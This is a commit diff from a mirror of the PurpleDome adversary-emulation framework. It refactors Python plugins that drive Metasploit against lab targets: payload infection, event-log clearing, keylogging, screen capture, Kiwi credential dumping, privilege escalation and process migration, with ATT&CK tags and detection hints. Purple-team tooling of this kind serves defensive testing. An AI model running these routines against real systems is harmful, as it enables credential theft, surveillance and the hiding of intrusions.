archive
/
PurpleDome
mirror of https://github.com/avast/PurpleDome
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixed several issues in metasploit attacks

Browse Source
pull/12/head
Thorsten Sick 3 years ago
parent 0cf8400eae
commit ac482e8b9e
10 changed files with 164 additions and 124 deletions
Show Stats Download Patch File Download Diff File

112
app/metasploit.py
Unescape Escape View File

@ -600,29 +600,41 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
result=res) result=res)
return res return res
def clearev(self, target): def clearev(self, target, **kwargs):
""" Clears windows event logs """ """ Clears windows event logs """
command = "clearev" command = "clearev"
ttp = "T1070.001" # It uses one out of three different ways to elevate privileges. ttp = "T1070.001" # It uses one out of three different ways to elevate privileges.
tactics = "Defense Evasion"
tactics_id = "TA0005"
description = """
Clear windows event logs to hide tracks
"""
self.attack_logger.vprint( self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp) ttp=ttp,
name="clearev",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target) res = self.meterpreter_execute_on([command], target)
print(res) print(res)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp, ttp=ttp,
logid=logid,
result=res) result=res)
return res return res
def screengrab(self, target): def screengrab(self, target, **kwargs):
""" Creates a screenshot """ Creates a screenshot
Before using it, migrate to a process running while you want to monitor. Before using it, migrate to a process running while you want to monitor.
@ -631,14 +643,25 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
command = "screengrab" command = "screengrab"
ttp = "T1113" # It uses one out of three different ways to elevate privileges. ttp = "T1113" # It uses one out of three different ways to elevate privileges.
tactics = "Collection"
tactics_id = "TA0009"
description = """
Do screen grabbing to collect data on target
"""
self.attack_logger.vprint( self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp) ttp=ttp,
name="screengrab",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on(["use espia"], target) res = self.meterpreter_execute_on(["use espia"], target)
print(res) print(res)
res = self.meterpreter_execute_on([command], target) res = self.meterpreter_execute_on([command], target)
@ -647,10 +670,11 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp, ttp=ttp,
logid=logid,
result=res) result=res)
return res return res
def keylogging(self, target, monitoring_time): def keylogging(self, target, monitoring_time, **kwargs):
""" Starts keylogging """ Starts keylogging
Before using it, migrate to a process running while you want to monitor. Before using it, migrate to a process running while you want to monitor.
@ -658,19 +682,29 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
"winlogon.exe" will monitor user logins. "explorer.exe" during the session. "winlogon.exe" will monitor user logins. "explorer.exe" during the session.
@param monitoring_time: Seconds the keylogger is running @param monitoring_time: Seconds the keylogger is running
@param monitoring_time: The time to monitor the keys. In seconds
""" """
command = "keyscan_start" command = "keyscan_start"
ttp = "T1056.001" # It uses one out of three different ways to elevate privileges. ttp = "T1056.001" # It uses one out of three different ways to elevate privileges.
tactics = "Collection"
tactics_id = "TA0009"
description = """
Log keys to get passwords and other credentials
"""
self.attack_logger.vprint( self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp) ttp=ttp,
name="keylogging",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target) res = self.meterpreter_execute_on([command], target)
print(res) print(res)
time.sleep(monitoring_time) time.sleep(monitoring_time)
@ -680,54 +714,80 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp, ttp=ttp,
logid=logid,
result=res) result=res)
return res return res
def getuid(self, target): def getuid(self, target, **kwargs):
""" Returns the UID """ Returns the UID
""" """
command = "getuid" command = "getuid"
ttp = "T1056.001" # It uses one out of three different ways to elevate privileges. ttp = "T1056.001" # It uses one out of three different ways to elevate privileges.
tactics = "Collection"
tactics_id = "TA0009"
description = """
Get user id
"""
self.attack_logger.vprint( self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp) ttp=ttp,
name="getuid",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target) res = self.meterpreter_execute_on([command], target)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp, ttp=ttp,
logid=logid,
result=res) result=res)
return res[0] return res[0]
def sysinfo(self, target): def sysinfo(self, target, **kwargs):
""" Returns the sysinfo """ Returns the sysinfo
""" """
command = "sysinfo" command = "sysinfo"
ttp = "T1082" # It uses one out of three different ways to elevate privileges. ttp = "T1082" # It uses one out of three different ways to elevate privileges.
tactics = "Discovery"
tactics_id = "TA0007"
description = """
Get basic system information
"""
self.attack_logger.vprint( self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp) ttp=ttp,
name="sysinfo",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target) res = self.meterpreter_execute_on([command], target)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp, ttp=ttp,
logid=logid,
result=res) result=res)
return res[0] return res[0]

21
plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py
Unescape Escape View File

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors # A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitClearevPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self): def __init__(self):
super().__init__() super().__init__()
self.plugin_path = __file__ self.plugin_path = __file__
@ -31,17 +33,12 @@ class MetasploitClearevPlugin(AttackPlugin):
payload_name = "babymetal.exe" payload_name = "babymetal.exe"
target = self.targets[0] target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password, self.metasploit.smart_infect(target,
attack_logger=self.attack_logger, payload=payload_type,
attacker=self.attacker_machine_plugin, outfile=payload_name,
username=self.metasploit_user) format="exe",
architecture="x64")
metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.clearev(target) self.metasploit.clearev(target)
return res return res

33
plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py
Unescape Escape View File

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors # A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
import socket import socket
@ -17,6 +17,8 @@ class MetasploitGetsystemPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self): def __init__(self):
super().__init__() super().__init__()
self.plugin_path = __file__ self.plugin_path = __file__
@ -33,27 +35,22 @@ class MetasploitGetsystemPlugin(AttackPlugin):
payload_name = "babymetal.exe" payload_name = "babymetal.exe"
target = self.targets[0] target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip()) ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
metasploit.smart_infect(target, self.metasploit.smart_infect(target,
payload=payload_type, payload=payload_type,
architecture="x64", architecture="x64",
platform="windows", platform="windows",
lhost=ip, lhost=ip,
format="exe", format="exe",
outfile=payload_name) outfile=payload_name)
# TODO: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70 # TODO: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70
metasploit.getsystem(target, self.metasploit.getsystem(target,
variant=self.conf['variant'], variant=self.conf['variant'],
situation_description="This is an example standalone attack step. In real world attacks there would be events before and after", situation_description="This is an example standalone attack step. In real world attacks there would be events before and after",
countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection." countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection."
) )
return res return res

4
plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py
Unescape Escape View File

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors # A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitGetuidPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self): def __init__(self):
super().__init__() super().__init__()
self.plugin_path = __file__ self.plugin_path = __file__

14
plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py
Unescape Escape View File

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors # A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitKeyloggingPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self): def __init__(self):
super().__init__() super().__init__()
self.plugin_path = __file__ self.plugin_path = __file__
@ -31,19 +33,15 @@ class MetasploitKeyloggingPlugin(AttackPlugin):
payload_name = "babymetal.exe" payload_name = "babymetal.exe"
target = self.targets[0] target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target, self.metasploit.smart_infect(target,
payload=payload_type, payload=payload_type,
outfile=payload_name, outfile=payload_name,
format="exe", format="exe",
architecture="x64") architecture="x64")
metasploit.migrate(target, name="winlogon.exe") self.metasploit.migrate(target, name="winlogon.exe")
metasploit.keylogging(target, monitoring_time=20) self.metasploit.keylogging(target, monitoring_time=20)
return res return res

34
plugins/default/metasploit_attacks/metasploit_kiwi_t1003/metasploit_kiwi_t1003.py
Unescape Escape View File

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors # A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
import socket import socket
@ -17,6 +17,8 @@ class MetasploitKiwiPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self): def __init__(self):
super().__init__() super().__init__()
self.plugin_path = __file__ self.plugin_path = __file__
@ -33,25 +35,21 @@ class MetasploitKiwiPlugin(AttackPlugin):
payload_name = "babymetal.exe" payload_name = "babymetal.exe"
target = self.targets[0] target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip()) ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
metasploit.smart_infect(target, self.metasploit.smart_infect(target,
payload=payload_type, payload=payload_type,
architecture="x64", architecture="x64",
platform="windows", platform="windows",
lhost=ip, lhost=ip,
format="exe", format="exe",
outfile=payload_name) outfile=payload_name)
metasploit.kiwi(target, self.metasploit.kiwi(target,
variant=self.conf['variant'], variant=self.conf['variant'],
situation_description="Kiwi is the modern version of mimikatz. It is integrated into metasploit. The attacker wants to get some credentials - reading them from memory.", situation_description="Kiwi is the modern version of mimikatz. It is integrated into metasploit. The attacker wants to get some credentials - reading them from memory.",
countermeasure="Memory access into critical processes should be monitored." countermeasure="Memory access into critical processes should be monitored."
) )
return res return res

13
plugins/default/metasploit_attacks/metasploit_migrate_t1055/metasploit_migrate.py
Unescape Escape View File

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors # A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
import socket import socket
@ -17,6 +17,8 @@ class MetasploitMigratePlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self): def __init__(self):
super().__init__() super().__init__()
self.plugin_path = __file__ self.plugin_path = __file__
@ -32,14 +34,9 @@ class MetasploitMigratePlugin(AttackPlugin):
payload_name = "babymetal.exe" payload_name = "babymetal.exe"
target = self.targets[0] target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip()) ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
metasploit.smart_infect(target, self.metasploit.smart_infect(target,
payload=payload_type, payload=payload_type,
architecture="x64", architecture="x64",
platform="windows", platform="windows",
@ -48,6 +45,6 @@ class MetasploitMigratePlugin(AttackPlugin):
outfile=payload_name outfile=payload_name
) )
metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64") self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64")
return res return res

13
plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py
Unescape Escape View File

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors # A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitPsPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self): def __init__(self):
super().__init__() super().__init__()
self.plugin_path = __file__ self.plugin_path = __file__
@ -31,17 +33,12 @@ class MetasploitPsPlugin(AttackPlugin):
payload_name = "babymetal.exe" payload_name = "babymetal.exe"
target = self.targets[0] target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password, self.metasploit.smart_infect(target,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target,
payload=payload_type, payload=payload_type,
outfile=payload_name, outfile=payload_name,
format="exe", format="exe",
architecture="x64") architecture="x64")
metasploit.ps_process_discovery(target) self.metasploit.ps_process_discovery(target)
return res return res

23
plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py
Unescape Escape View File

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors # A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitScreengrabPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self): def __init__(self):
super().__init__() super().__init__()
self.plugin_path = __file__ self.plugin_path = __file__
@ -31,19 +33,14 @@ class MetasploitScreengrabPlugin(AttackPlugin):
payload_name = "babymetal.exe" payload_name = "babymetal.exe"
target = self.targets[0] target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password, self.metasploit.smart_infect(target,
attack_logger=self.attack_logger, payload=payload_type,
attacker=self.attacker_machine_plugin, outfile=payload_name,
username=self.metasploit_user) format="exe",
architecture="x64")
metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM") self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM")
metasploit.screengrab(target) self.metasploit.screengrab(target)
return res return res

21
plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py
Unescape Escape View File

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors # A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitSysinfoPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self): def __init__(self):
super().__init__() super().__init__()
self.plugin_path = __file__ self.plugin_path = __file__
@ -31,18 +33,13 @@ class MetasploitSysinfoPlugin(AttackPlugin):
payload_name = "babymetal.exe" payload_name = "babymetal.exe"
target = self.targets[0] target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password, self.metasploit.smart_infect(target,
attack_logger=self.attack_logger, payload=payload_type,
attacker=self.attacker_machine_plugin, outfile=payload_name,
username=self.metasploit_user) format="exe",
architecture="x64")
metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
si = metasploit.sysinfo(target) si = self.metasploit.sysinfo(target)
print(f"Sysinfo: {si}") print(f"Sysinfo: {si}")
return res return res

Write Preview
Loading…
Cancel
Save